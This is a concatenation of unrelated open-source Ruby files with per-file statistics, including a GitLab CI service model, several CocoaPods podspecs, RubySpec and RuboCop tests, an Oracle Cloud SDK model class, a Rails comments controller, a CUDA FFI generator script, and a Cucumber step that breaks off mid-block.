# id :integer not null, primary key
# type :string(255)
# title :string(255)
# token :string(255)
# project_id :integer not null
# created_at :datetime
# updated_at :datetime
# active :boolean default(FALSE), not null
# project_url :string(255)
# subdomain :string(255)
# room :string(255)
# recipients :text
# api_key :string(255)
#
class GitlabCiService < Service
attr_accessible :project_url
validates :project_url, presence: true, if: :activated?
validates :token, presence: true, if: :activated?
delegate :execute, to: :service_hook, prefix: nil
after_save :compose_service_hook, if: :activated?
def compose_service_hook
hook = service_hook || build_service_hook
hook.url = [project_url, "/build", "?token=#{token}"].join("")
hook.save
end
def commit_status_path sha
project_url + "/builds/#{sha}/status.json?token=#{token}"
end
def commit_status sha
response = HTTParty.get(commit_status_path(sha), verify: false)
if response.code == 200 and response["status"]
response["status"]
else
:error
end
end
def build_page sha
project_url + "/builds/#{sha}"
end
def builds_path
project_url + "?ref=" + project.default_branch
end
def status_img_path
project_url + "/status.png?ref=" + project.default_branch
end
def title
'GitLab CI'
end
def description
'Continuous integration server from GitLab'
end
def to_param
'gitlab_ci'
end
def fields
[
{ type: 'text', name: 'token', placeholder: 'GitLab CI project specific token' },
{ type: 'text', name: 'project_url', placeholder: 'http://ci.gitlabhq.com/projects/3'}
]
end
end
| 22.395062 | 92 | 0.647189 |
e9ab5cc7a99e87a646a8e1df98ef7d6e60389a78 | 749 | Pod::Spec.new do |s|
s.name = "YZClockView"
s.version = "0.1.1"
s.summary = "A simple, elegant UIView to express time."
s.homepage = "https://github.com/AustinChou/YZClockView"
s.license = { :type => "MIT", :file => "LICENSE" }
s.author = { "Austin Chou" => "[email protected]" }
s.social_media_url = "http://twitter.com/austinchou0126"
s.platform = :ios
s.ios.deployment_target = "6.0"
s.source = { :git => "https://github.com/AustinChou/YZClockView.git", :tag => s.version }
s.source_files = "Classes/*.{h,m}"
s.public_header_files = "Classes/*.h"
s.requires_arc = true
end
| 46.8125 | 106 | 0.53271 |
264c916100dae7aca384cd0de3212f894448ffdd | 3,999 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../fixtures/classes', __FILE__)
require File.expand_path('../shared/enumeratorize', __FILE__)
describe "Array#reject" do
it "returns a new array without elements for which block is true" do
ary = [1, 2, 3, 4, 5]
ary.reject { true }.should == []
ary.reject { false }.should == ary
ary.reject { nil }.should == ary
ary.reject { 5 }.should == []
ary.reject { |i| i < 3 }.should == [3, 4, 5]
ary.reject { |i| i % 2 == 0 }.should == [1, 3, 5]
end
it "returns self when called on an Array emptied with #shift" do
array = [1]
array.shift
array.reject { |x| true }.should == []
end
it "properly handles recursive arrays" do
empty = ArraySpecs.empty_recursive_array
empty.reject { false }.should == [empty]
empty.reject { true }.should == []
array = ArraySpecs.recursive_array
array.reject { false }.should == [1, 'two', 3.0, array, array, array, array, array]
array.reject { true }.should == []
end
ruby_version_is "" ... "1.9.3" do
not_compliant_on :ironruby do
it "returns subclass instance on Array subclasses" do
ArraySpecs::MyArray[1, 2, 3].reject { |x| x % 2 == 0 }.should be_kind_of(ArraySpecs::MyArray)
end
end
deviates_on :ironruby do
it "does not return subclass instance on Array subclasses" do
ArraySpecs::MyArray[1, 2, 3].reject { |x| x % 2 == 0 }.should be_kind_of(Array)
end
end
end
ruby_version_is "1.9.3" do
it "does not return subclass instance on Array subclasses" do
ArraySpecs::MyArray[1, 2, 3].reject { |x| x % 2 == 0 }.should be_kind_of(Array)
end
it "does not retain instance variables" do
array = []
array.instance_variable_set("@variable", "value")
array.reject { false }.instance_variable_get("@variable").should == nil
end
end
it_behaves_like :enumeratorize, :reject
end
describe "Array#reject!" do
it "removes elements for which block is true" do
a = [3, 4, 5, 6, 7, 8, 9, 10, 11]
a.reject! { |i| i % 2 == 0 }.should equal(a)
a.should == [3, 5, 7, 9, 11]
a.reject! { |i| i > 8 }
a.should == [3, 5, 7]
a.reject! { |i| i < 4 }
a.should == [5, 7]
a.reject! { |i| i == 5 }
a.should == [7]
a.reject! { true }
a.should == []
a.reject! { true }
a.should == []
end
it "properly handles recursive arrays" do
empty = ArraySpecs.empty_recursive_array
empty_dup = empty.dup
empty.reject! { false }.should == nil
empty.should == empty_dup
empty = ArraySpecs.empty_recursive_array
empty.reject! { true }.should == []
empty.should == []
array = ArraySpecs.recursive_array
array_dup = array.dup
array.reject! { false }.should == nil
array.should == array_dup
array = ArraySpecs.recursive_array
array.reject! { true }.should == []
array.should == []
end
it "returns nil when called on an Array emptied with #shift" do
array = [1]
array.shift
array.reject! { |x| true }.should == nil
end
it "returns nil if no changes are made" do
a = [1, 2, 3]
a.reject! { |i| i < 0 }.should == nil
a.reject! { true }
a.reject! { true }.should == nil
end
ruby_version_is "" ... "1.9" do
it "raises a TypeError on a frozen array" do
lambda { ArraySpecs.frozen_array.reject! {} }.should raise_error(TypeError)
end
it "raises a TypeError on an empty frozen array" do
lambda { ArraySpecs.empty_frozen_array.reject! {} }.should raise_error(TypeError)
end
end
ruby_version_is "1.9" do
it "raises a RuntimeError on a frozen array" do
lambda { ArraySpecs.frozen_array.reject! {} }.should raise_error(RuntimeError)
end
it "raises a RuntimeError on an empty frozen array" do
lambda { ArraySpecs.empty_frozen_array.reject! {} }.should raise_error(RuntimeError)
end
end
it_behaves_like :enumeratorize, :reject!
end
| 30.067669 | 101 | 0.623906 |
01d4a6f34cacf61ae5514c4db0cd6e879f856493 | 1,506 | # frozen_string_literal: true
#
# Copyright:: 2020, Chef Software, Inc.
# Author:: Tim Smith (<[email protected]>)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'spec_helper'
describe RuboCop::Cop::Chef::ChefDeprecations::WindowsFeatureServermanagercmd, :config do
subject(:cop) { described_class.new(config) }
it 'registers an offense when windows_feature sets install_method to :servermanagercmd' do
expect_offense(<<~RUBY)
windows_feature 'DHCP' do
install_method :servermanagercmd
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ The `windows_feature` resource no longer supports setting the `install_method` to `:servermanagercmd`. `:windows_feature_dism` or `:windows_feature_powershell` should be used instead.
end
RUBY
end
it "doesn't register an offense when windows_feature sets install_method to :windows_feature_dism" do
expect_no_offenses(<<~RUBY)
windows_feature 'DHCP' do
install_method :windows_feature_dism
end
RUBY
end
end
| 36.731707 | 224 | 0.734396 |
1a0e30b21f87e826f7804b9a10bbf929627e9e5d | 11,026 | # Copyright (c) 2016, 2020, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
require 'logger'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
module OCI
# Backup Options
# To use any of the API operations, you must be authorized in an IAM policy. If you're not authorized, talk to an administrator. If you're an administrator who needs to write policies to give users access, see [Getting Started with Policies](https://docs.cloud.oracle.com/Content/Identity/Concepts/policygetstarted.htm).
#
class Database::Models::DbBackupConfig
AUTO_BACKUP_WINDOW_ENUM = [
AUTO_BACKUP_WINDOW_SLOT_ONE = 'SLOT_ONE'.freeze,
AUTO_BACKUP_WINDOW_SLOT_TWO = 'SLOT_TWO'.freeze,
AUTO_BACKUP_WINDOW_SLOT_THREE = 'SLOT_THREE'.freeze,
AUTO_BACKUP_WINDOW_SLOT_FOUR = 'SLOT_FOUR'.freeze,
AUTO_BACKUP_WINDOW_SLOT_FIVE = 'SLOT_FIVE'.freeze,
AUTO_BACKUP_WINDOW_SLOT_SIX = 'SLOT_SIX'.freeze,
AUTO_BACKUP_WINDOW_SLOT_SEVEN = 'SLOT_SEVEN'.freeze,
AUTO_BACKUP_WINDOW_SLOT_EIGHT = 'SLOT_EIGHT'.freeze,
AUTO_BACKUP_WINDOW_SLOT_NINE = 'SLOT_NINE'.freeze,
AUTO_BACKUP_WINDOW_SLOT_TEN = 'SLOT_TEN'.freeze,
AUTO_BACKUP_WINDOW_SLOT_ELEVEN = 'SLOT_ELEVEN'.freeze,
AUTO_BACKUP_WINDOW_SLOT_TWELVE = 'SLOT_TWELVE'.freeze,
AUTO_BACKUP_WINDOW_UNKNOWN_ENUM_VALUE = 'UNKNOWN_ENUM_VALUE'.freeze
].freeze
# If set to true, configures automatic backups. If you previously used RMAN or dbcli to configure backups and then you switch to using the Console or the API for backups, a new backup configuration is created and associated with your database. This means that you can no longer rely on your previously configured unmanaged backups to work.
# @return [BOOLEAN]
attr_accessor :auto_backup_enabled
# Number of days between the current and the earliest point of recoverability covered by automatic backups.
# This value applies to automatic backups only. After a new automatic backup has been created, Oracle removes old automatic backups that are created before the window.
# When the value is updated, it is applied to all existing automatic backups.
#
# @return [Integer]
attr_accessor :recovery_window_in_days
# Time window selected for initiating automatic backup for the database system. There are twelve available two-hour time windows. If no option is selected, a start time between 12:00 AM to 7:00 AM in the region of the database is automatically chosen. For example, if the user selects SLOT_TWO from the enum list, the automatic backup job will start in between 2:00 AM (inclusive) to 4:00 AM (exclusive).
#
# Example: `SLOT_TWO`
#
# @return [String]
attr_reader :auto_backup_window
# Backup destination details.
# @return [Array<OCI::Database::Models::BackupDestinationDetails>]
attr_accessor :backup_destination_details
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
# rubocop:disable Style/SymbolLiteral
'auto_backup_enabled': :'autoBackupEnabled',
'recovery_window_in_days': :'recoveryWindowInDays',
'auto_backup_window': :'autoBackupWindow',
'backup_destination_details': :'backupDestinationDetails'
# rubocop:enable Style/SymbolLiteral
}
end
# Attribute type mapping.
def self.swagger_types
{
# rubocop:disable Style/SymbolLiteral
'auto_backup_enabled': :'BOOLEAN',
'recovery_window_in_days': :'Integer',
'auto_backup_window': :'String',
'backup_destination_details': :'Array<OCI::Database::Models::BackupDestinationDetails>'
# rubocop:enable Style/SymbolLiteral
}
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
# @option attributes [BOOLEAN] :auto_backup_enabled The value to assign to the {#auto_backup_enabled} property
# @option attributes [Integer] :recovery_window_in_days The value to assign to the {#recovery_window_in_days} property
# @option attributes [String] :auto_backup_window The value to assign to the {#auto_backup_window} property
# @option attributes [Array<OCI::Database::Models::BackupDestinationDetails>] :backup_destination_details The value to assign to the {#backup_destination_details} property
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
self.auto_backup_enabled = attributes[:'autoBackupEnabled'] unless attributes[:'autoBackupEnabled'].nil?
raise 'You cannot provide both :autoBackupEnabled and :auto_backup_enabled' if attributes.key?(:'autoBackupEnabled') && attributes.key?(:'auto_backup_enabled')
self.auto_backup_enabled = attributes[:'auto_backup_enabled'] unless attributes[:'auto_backup_enabled'].nil?
self.recovery_window_in_days = attributes[:'recoveryWindowInDays'] if attributes[:'recoveryWindowInDays']
raise 'You cannot provide both :recoveryWindowInDays and :recovery_window_in_days' if attributes.key?(:'recoveryWindowInDays') && attributes.key?(:'recovery_window_in_days')
self.recovery_window_in_days = attributes[:'recovery_window_in_days'] if attributes[:'recovery_window_in_days']
self.auto_backup_window = attributes[:'autoBackupWindow'] if attributes[:'autoBackupWindow']
raise 'You cannot provide both :autoBackupWindow and :auto_backup_window' if attributes.key?(:'autoBackupWindow') && attributes.key?(:'auto_backup_window')
self.auto_backup_window = attributes[:'auto_backup_window'] if attributes[:'auto_backup_window']
self.backup_destination_details = attributes[:'backupDestinationDetails'] if attributes[:'backupDestinationDetails']
raise 'You cannot provide both :backupDestinationDetails and :backup_destination_details' if attributes.key?(:'backupDestinationDetails') && attributes.key?(:'backup_destination_details')
self.backup_destination_details = attributes[:'backup_destination_details'] if attributes[:'backup_destination_details']
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Custom attribute writer method checking allowed values (enum).
# @param [Object] auto_backup_window Object to be assigned
def auto_backup_window=(auto_backup_window)
# rubocop:disable Style/ConditionalAssignment
if auto_backup_window && !AUTO_BACKUP_WINDOW_ENUM.include?(auto_backup_window)
OCI.logger.debug("Unknown value for 'auto_backup_window' [" + auto_backup_window + "]. Mapping to 'AUTO_BACKUP_WINDOW_UNKNOWN_ENUM_VALUE'") if OCI.logger
@auto_backup_window = AUTO_BACKUP_WINDOW_UNKNOWN_ENUM_VALUE
else
@auto_backup_window = auto_backup_window
end
# rubocop:enable Style/ConditionalAssignment
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# Checks equality by comparing each attribute.
# @param [Object] other the other object to be compared
def ==(other)
return true if equal?(other)
self.class == other.class &&
auto_backup_enabled == other.auto_backup_enabled &&
recovery_window_in_days == other.recovery_window_in_days &&
auto_backup_window == other.auto_backup_window &&
backup_destination_details == other.backup_destination_details
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# @see the `==` method
# @param [Object] other the other object to be compared
def eql?(other)
self == other
end
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[auto_backup_enabled, recovery_window_in_days, auto_backup_window, backup_destination_details].hash
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /^Array<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
public_method("#{key}=").call(
attributes[self.class.attribute_map[key]]
.map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
)
end
elsif !attributes[self.class.attribute_map[key]].nil?
public_method("#{key}=").call(
OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
)
end
# or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = public_method(attr).call
next if value.nil? && !instance_variable_defined?("@#{attr}")
hash[param] = _to_hash(value)
end
hash
end
private
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
| 46.919149 | 408 | 0.724197 |
2818ec12876a91370d4cd05051f727d19147adc4 | 169 | require 'lib/bitcoin/price'
module Bitcoin
def self.get_current_price
Price.get_current
end
def self.get_past_month_price
Price.get_past_month
end
end
| 14.083333 | 31 | 0.769231 |
1d657e7b1d55f46906d50f2568d9d21f52026490 | 187 | class RemoveCategoryFromStories < ActiveRecord::Migration[6.0]
def change
remove_column :stories, :cateogry_code, :string
add_column :stories, :category_code, :string
end
end
| 26.714286 | 62 | 0.764706 |
08973ec52b5d6b72f7300be61c155ffa68a156a5 | 56 | class Domain < ActiveRecord::Base
has_many :pages
end
| 14 | 33 | 0.767857 |
f7ba8faecc5d34e6393890feb8c04e84240ae629 | 2,523 | class CommentsController < ProtectedController
before_action :skip_policy_scope
before_action :set_comment, only: [:show, :edit, :update, :destroy]
before_action :set_commentable
# GET /commentable/:commentable_id/comments
# GET /commentable/:commentable_id/comments.json
def index
if @commentable.present?
@comments = @commentable.comments.order(created_at: :desc)
else
@comments = Comment.all.order(created_at: :desc)
end
end
# GET /comments/1
def show
authorize @comment
end
# GET /commentable/:commentable_id/new
def new
@comment = @commentable.comments.new
authorize @comment
end
def edit
authorize @comment
end
# POST /commentable/:commentable_id/comments
# POST /commentable/:commentable_id/comments.json
def create
@comment = @commentable.comments.new(comment_params)
@comment.user = current_user
authorize @comment
respond_to do |format|
if @comment.save
format.html { redirect_to @comment, notice: 'Comment was successfully created.' }
format.json { render :show, status: :created, location: polymorphic_path([@commentable, @comment]) }
else
format.html { render :new }
format.json { render json: @comment.errors, status: :unprocessable_entity }
end
end
end
# PATCH/PUT /comments/1
# PATCH/PUT /comments/1.json
def update
authorize @comment
respond_to do |format|
if @comment.update(comment_params)
format.html { redirect_to @comment, notice: 'Comment was successfully updated.' }
format.json { render :show, status: :ok, location: @comment }
else
format.html { render :edit }
format.json { render json: @comment.errors, status: :unprocessable_entity }
end
end
end
# DELETE /comments/1
# DELETE /comments/1.json
def destroy
authorize @comment
@comment.destroy
respond_to do |format|
format.html { redirect_to comments_path, notice: 'Comment was successfully destroyed.' }
format.json { head :no_content }
end
end
private
def set_comment
@comment = Comment.includes(:user, :commentable).find(params[:id])
end
# Only allow the white listed params through.
def comment_params
params.fetch(:comment, {}).permit(:body)
end
def set_commentable
resource, id = request.path.split('/')[1,2]
@commentable = resource.singularize.classify.constantize.find(id) if id.present?
end
end | 27.129032 | 108 | 0.673801 |
089242c53a3a277f06ab2ded5156ca668f3a1f53 | 1,094 | require 'json'
# Returns the version number for a package.json file
pkg_version = lambda do |dir_from_root = '', version = 'version'|
path = File.join(__dir__, dir_from_root, 'package.json')
JSON.parse(File.read(path))[version]
end
# Let the main package.json decide the version number for the pod
package_version = pkg_version.call
Pod::Spec.new do |s|
s.name = "ReactNativeKakaoMaps"
s.version = package_version
s.summary = "A react native module kakao maps"
s.description = <<-DESC
A react native module kakao maps
DESC
s.homepage = "https://github.com/jiggag/react-native-kakao-maps"
s.license = "MIT"
s.author = { "Atul R" => "[email protected]" }
s.platform = :ios, "9.0"
s.source = { :git => "https://github.com/jiggag/react-native-kakao-maps.git", :tag => s.version.to_s }
s.source_files = "ios/*.{h,m}"
s.vendored_frameworks = 'ios/DaumMap.embeddedframework/DaumMap.framework'
s.resources = ['ios/DaumMap.embeddedframework/Resources/*.png']
s.dependency "React"
end
| 35.290323 | 110 | 0.655393 |
1afc79542cc47005b82ef5a596a45bf7d7f415e5 | 889 | # frozen_string_literal: true
# Copyright 2016-2021 Copado NCS LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require "kitchen/terraform/command/version"
::RSpec.describe ::Kitchen::Terraform::Command::Version do
subject do
described_class.new
end
describe "#to_s" do
specify "should return the command" do
expect(subject.to_s).to eq "version"
end
end
end
| 29.633333 | 74 | 0.746907 |
ab36f0823fdec66ed7b1ffb9400ed55d5e063255 | 3,328 | class UserProfilesController < ApplicationController
def show
id = 0
if user_signed_in?
id = current_user.id
end
if params["id"] != nil
id = params["id"].to_i
end
@user_profile = UserProfile.where({:user_id => id}).last
if @user_profile == nil
flash[:error] = "no such user exist"
redirect_to '/'
end
@intersts = UserInterst.Find_by_User(id)
end
def edit
if user_signed_in?
@user_profile = UserProfile.where({:user_id => current_user.id}).last
else
flash[:error] = "login to edit"
redirect_to dont_do_mischievous_path
end
end
def edit_intersts
if user_signed_in?
@intersts = UserInterst.Find_by_User(current_user.id)
@tags = Tag.all
else
flash[:error] = "login to edit"
redirect_to dont_do_mischievous_path
end
end
def update_intrests
if user_signed_in?
tagIds = []
tag_ids = params["tag_ids"]
if tag_ids != nil
tag_ids.each do |tag_id|
if Integer(tag_id, exception: false)
tagid = tag_id.to_i
if tagid > 0
puts tagid
if Tag.find_by_id(tagid) != nil
tagIds << tagid
else
puts "error :: unknown tagid entered"
end
end
end
end
end
UserInterst::Delete_by_User(current_user.id)
tagIds.each do |tag_id|
UserInterst.Create(current_user.id,tag_id)
end
redirect_to current_user_profile_path
else
flash[:error] = "login to edit"
redirect_to dont_do_mischievous_path
end
end
def update
if user_signed_in?
@user_profile = UserProfile.where({:user_id => current_user.id}).last
puts params[:new_params]
@user_profile.full_name = params[:new_params]["full_name"]
@user_profile.dob = DateTime.parse(params[:new_params][:dob])
@user_profile.college_id = params[:new_params][:college_id]
@user_profile.country = params[:new_params][:country]
if params[:new_params][:profile_picture] != nil
@user_profile.profile_picture.attach(params[:new_params][:profile_picture])
end
#intializing points
if @user_profile.points == nil
@user_profile.points = 0
end
#save
if @user_profile.save
flash[:success] = 'saved successfully'
else
flash[:error] = 'not saved please try again.'
end
else
flash[:error] = "login to update userprofile"
end
redirect_to '/user_profiles/'
end
end
| 32.627451 | 99 | 0.477764 |
28e1004bf39406ddd977efeb9a3c8034465b5f12 | 206 | # TODO: need to figure out something better for measures.yml
# APP_CONFIG.merge! YAML.load_file(Rails.root.join('config', 'measures.yml'))
Dir[Rails.root + 'lib/**/*.rb'].sort.each { |file| require file }
| 41.2 | 77 | 0.708738 |
03a1b0eff9a22aa0bd14ccea2abb1d45216ee584 | 559 | require 'action_view'
module Roll
module Amp
module Style
# The <nosript> tag.
class NoScriptTag
include ActionView::Helpers::TagHelper
# Initializes new instance of the noscript tag.
# @param [String] the content of the tag.
def initialize(content)
@content = content
end
# Prints this tag as HTML.
# @return [String] HTML-safe string containing the tag's HTML view.
def to_html
content_tag('noscript', @content)
end
end
end
end
end
| 22.36 | 75 | 0.599284 |
aba5e0a258687e0b840c6bb291d8f2ebe4f571fc | 601 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
15.times do
post = Post.create({title: Faker::Hacker.abbreviation, content: Faker::Hacker.say_something_smart})
3.times do
post.comments.build({content: Faker::Hacker.say_something_smart})
end
post.save
end | 40.066667 | 111 | 0.71381 |
2641a203a29555d5e3f0df8c8d1d535249ae2fd9 | 1,452 | #!/usr/bin/ruby
require 'dotenv/load'
Pod::Spec.new do |spec|
spec.name = "Contentful"
spec.version = ENV['CONTENTFUL_SDK_VERSION']
spec.summary = "Swift SDK for Contentful's Content Delivery API."
spec.homepage = "https://github.com/contentful/contentful.swift/"
spec.social_media_url = 'https://twitter.com/contentful'
spec.license = {
:type => 'MIT',
:file => 'LICENSE'
}
spec.authors = { "JP Wright" => "[email protected]", "Boris Bügling" => "[email protected]" }
spec.source = { :git => "https://github.com/contentful/contentful.swift.git",
:tag => spec.version.to_s }
spec.requires_arc = true
spec.source_files = 'Sources/Contentful/*.swift'
spec.frameworks = 'CoreLocation'
## Platform specific source code.
spec.ios.source_files = 'Sources/Contentful/UIKit/*.swift'
spec.watchos.source_files = 'Sources/Contentful/UIKit/*.swift'
spec.tvos.source_files = 'Sources/Contentful/UIKit/*.swift'
spec.osx.source_files = 'Sources/Contentful/AppKit/*.swift'
spec.ios.deployment_target = '8.0'
spec.osx.deployment_target = '10.10'
spec.watchos.deployment_target = '2.0'
spec.tvos.deployment_target = '9.0'
# Subspecs
spec.subspec 'ImageOptions' do |subspec|
subspec.source_files = 'Sources/Contentful/ImageOptions.swift'
end
end
| 33 | 101 | 0.632231 |
1c2e0d76d73b48666d3b306b611b6cacecba9d0f | 5,131 | require_relative 'cuda_model'
require_relative 'gen_probe_base.rb'
$all_types = $cuda_api["typedefs"]
$all_structs = $cuda_api["structs"]
$all_unions = $cuda_api["unions"]
$all_enums = $cuda_api["enums"]
$all_funcs = $cuda_api["functions"]
$all_enum_names = []
$all_bitfield_names = []
$all_struct_names = []
$all_union_names = []
$objects = $all_types.select { |t|
t.type.kind_of?(YAMLCAst::Pointer) &&
t.type.type.kind_of?(YAMLCAst::Struct)
}.collect { |t| t.name }
$all_types.each { |t|
if t.type.kind_of?(YAMLCAst::CustomType) && CUDA_OBJECTS.include?(t.type.name)
$objects.push t.name
end
}
$int_scalars = {}
$all_types.each { |t|
if t.type.kind_of?(YAMLCAst::CustomType) && CUDA_INT_SCALARS.include?(t.type.name)
$int_scalars[t.name] = t.type.name
end
}
def to_snake_case(str)
str.gsub(/([A-Z][A-Z0-9]*)/, '_\1').downcase
end
def to_class_name(name)
case name
when "CUstreamBatchMemOpType"
return "CUStreamBatchMemOpType"
when "CUstreamBatchMemOpParams"
return "CUStreamBatchMemOpParams"
end
mod = to_name_space(name)
mod = "" unless mod
n = name.gsub(/_t\z/, "").gsub(/\A#{mod}/, "").split("_").collect(&:capitalize).join
mod << n.gsub("Uuid","UUID").gsub("Ipc", "IPC").gsub("P2p", "P2P")
end
def to_ffi_name(name)
case name
when nil
return ":anonymous"
when "unsigned int"
return ":uint"
when "unsigned short"
return ":ushort"
when "unsigned char"
return ":uchar"
when "unsigned long long int"
return ":uint64"
when "size_t"
return ":size_t"
when "cuuint64_t"
return ":cuuint64_t"
when "cuuint32_t"
return ":cuuint32_t"
end
n = to_class_name(name)
mod = to_name_space(name)
if mod
n = n.gsub(/\A#{mod}/, "")
mod << "_"
mod.downcase!
else
mod = ""
end
n = to_snake_case(n).gsub(/\A_+/, "")
mod << n
mod.to_sym.inspect
end
def to_name_space(name)
case name
when /\ACUDA/
"CUDA"
when /\ACU/
"CU"
else
nil
end
end
$all_types.each { |t|
if t.type.kind_of? YAMLCAst::Enum
enum = $all_enums.find { |e| t.type.name == e.name }
if false
$all_bitfield_names.push t.name
else
$all_enum_names.push t.name
end
elsif t.type.kind_of? YAMLCAst::Struct
$all_struct_names.push t.name
elsif t.type.kind_of? YAMLCAst::Union
$all_union_names.push t.name
end
}
module YAMLCAst
class Struct
def to_ffi
res = []
members.each { |m|
mt = case m.type
when Array
m.type.to_ffi
when Pointer
":pointer"
else
if !m.type.name
print_lambda = lambda { |m|
s = "#{m[0]}, "
if m[1].kind_of?(::Array)
s << "[ #{m[1][0]}, #{m[1][1]} ]"
else
s << "#{m[1]}"
end
s
}
case m.type
when Struct
membs = m.type.to_ffi
"(Class::new(FFI::CUDAStruct) { layout #{membs.collect(&print_lambda).join(", ")} }.by_value)"
when Union
membs = m.type.to_ffi
"(Class::new(FFI::CUDAUnion) { layout #{membs.collect(&print_lambda).join(", ")} }.by_value)"
else
raise "Error type unknown!"
end
else
to_ffi_name(m.type.name)
end
end
res.push [m.name.to_sym.inspect, mt]
}
res
end
end
class Union
def to_ffi
res = []
members.each { |m|
mt = case m.type
when Array
m.type.to_ffi
when Pointer
":pointer"
else
if !m.type.name
print_lambda = lambda { |m|
s = "#{m[0]}, "
if m[1].kind_of?(::Array)
s << "[ #{m[1][0]}, #{m[1][1]} ]"
else
s << "#{m[1]}"
end
s
}
case m.type
when Struct
membs = m.type.to_ffi
"(Class::new(FFI::CUDAStruct) { layout #{membs.collect(&print_lambda).join(", ")} }.by_value)"
when Union
membs = m.type.to_ffi
"(Class::new(FFI::CUDAUnion) { layout #{membs.collect(&print_lambda).join(", ")} }.by_value)"
else
raise "Error type unknown!"
end
else
to_ffi_name(m.type.name)
end
end
res.push [m.name.to_sym.inspect, mt]
}
res
end
end
class Array
def to_ffi
t = case type
when Pointer
":pointer"
else
to_ffi_name(type.name)
end
[ t, length ]
end
end
class Function
def to_ffi
t = to_ffi_name(type.name)
p = params.collect { |par|
if par.type.kind_of?(Pointer)
if par.type.type.respond_to?(:name) &&
$all_struct_names.include?(par.type.type.name)
"#{to_class_name(par.type.type.name)}.ptr"
else
":pointer"
end
else
to_ffi_name(par.type.name)
end
}
[t, p]
end
end
end
| 23.217195 | 108 | 0.53284 |
2685d0a945dc5cea537d74be73ef98dda247ecf4 | 1,260 | class Workflow < ApplicationRecord
has_many :taggings, as: :taggable, dependent: :destroy
has_many :tags, through: :taggings
belongs_to :user
has_many(
:workflow_modules,
-> { order(:position) },
inverse_of: :workflow,
dependent: :destroy,
)
accepts_nested_attributes_for :workflow_modules
has_many(
:zoon_modules,
-> { unscope(where: :visible) },
through: :workflow_modules,
)
has_many :feedbacks,
-> {
order('updated_at DESC').extending(Feedback::Upserter)
},
as: :feedbackable,
dependent: :destroy
has_many :comments,
-> { comments },
as: :feedbackable,
class_name: 'Feedback'
FAMILIES = ["occurrence", "covariate", "process", "model", "output"]
FAMILIES.each do |family|
enum "#{family}_composition_type" => {
list: 0,
chain: 1,
replicate: 2,
}, _suffix: true
end
scope :search, generate_search_scope(:workflows, ['title', 'description'])
def composition_types
FAMILIES.map do |family|
[family, send("#{family}_composition_type")]
end.to_h
end
def average_rating
feedbacks.average(:rating).to_f
end
def rating_count
feedbacks.count
end
def comment_count
feedbacks.comments.count
end
end
| 20.322581 | 76 | 0.655556 |
4afb18dcb622659ba13ec7f0e5d952039f563e57 | 2,435 |
When(/^I wait until I see "([^"]*)" text$/) do |text|
begin
Timeout.timeout(DEFAULT_TIMEOUT) do
loop do
break if page.has_content?(text)
sleep 3
end
end
